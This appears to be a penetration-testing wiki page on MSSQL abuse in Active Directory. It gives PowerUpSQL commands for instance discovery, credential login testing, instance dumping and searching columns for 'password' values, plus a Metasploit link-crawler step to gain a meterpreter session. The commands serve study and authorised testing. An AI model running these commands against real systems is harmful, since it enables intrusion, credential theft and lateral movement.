MSSQL AD Abuse

MSSQL Enumeration / Discovery

The PowerShell module PowerUpSQL is very useful in this case.

Copy

Import-Module .\PowerupSQL.psd1

Enumerating from the network without domain session

# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

#If you don't have an AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10

#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test

Enumerating from inside the domain

# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

#Get info about valid MSQL instances running in the domain
#This looks for SPNs that start with MSSQL (not always is a MSSQL running instance)
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose 

#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose

#Try to connect and obtain info from each MSSQL server (also useful to check connectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

# Get DBs, test connections and get info in Oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

MSSQL Basic Abuse

Access DB

#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"

#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"

# Search keywords in columns trying to access the MSSQL DBs
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize

Metasploit

You can easily check for trusted links using Metasploit.

Copy

#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session

Notice that Metasploit will try to abuse only the openquery() function in MSSQL (so, if you can't execute a command with openquery() you will need to try the EXECUTE method manually to execute commands, see more below.)

PreviousMSSQL Injection NextLinked Server Exploitation

Last updated 4 months ago

# Get local MSSQL instance (if any) Get-SQLInstanceLocal Get-SQLInstanceLocal | Get-SQLServerInfo #If you don't have an AD account, you can try to find MSSQL scanning via UDP #First, you will need a list of hosts to scan Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10 #If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them #The discovered MSSQL servers must be on the file: C:\temp\instances.txt Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test

# Get local MSSQL instance (if any) Get-SQLInstanceLocal Get-SQLInstanceLocal | Get-SQLServerInfo #Get info about valid MSQL instances running in the domain #This looks for SPNs that start with MSSQL (not always is a MSSQL running instance) Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose #Test connections with each one Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose #Try to connect and obtain info from each MSSQL server (also useful to check connectivity) Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose # Get DBs, test connections and get info in Oneliner Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

#Perform a SQL query Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername" #Dump an instance (a lotof CVSs generated in current dir) Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql" # Search keywords in columns trying to access the MSSQL DBs ## This won't use trusted SQL links Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize

#Set username, password, windows auth (if using AD), IP... msf> use exploit/windows/mssql/mssql_linkcrawler [msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session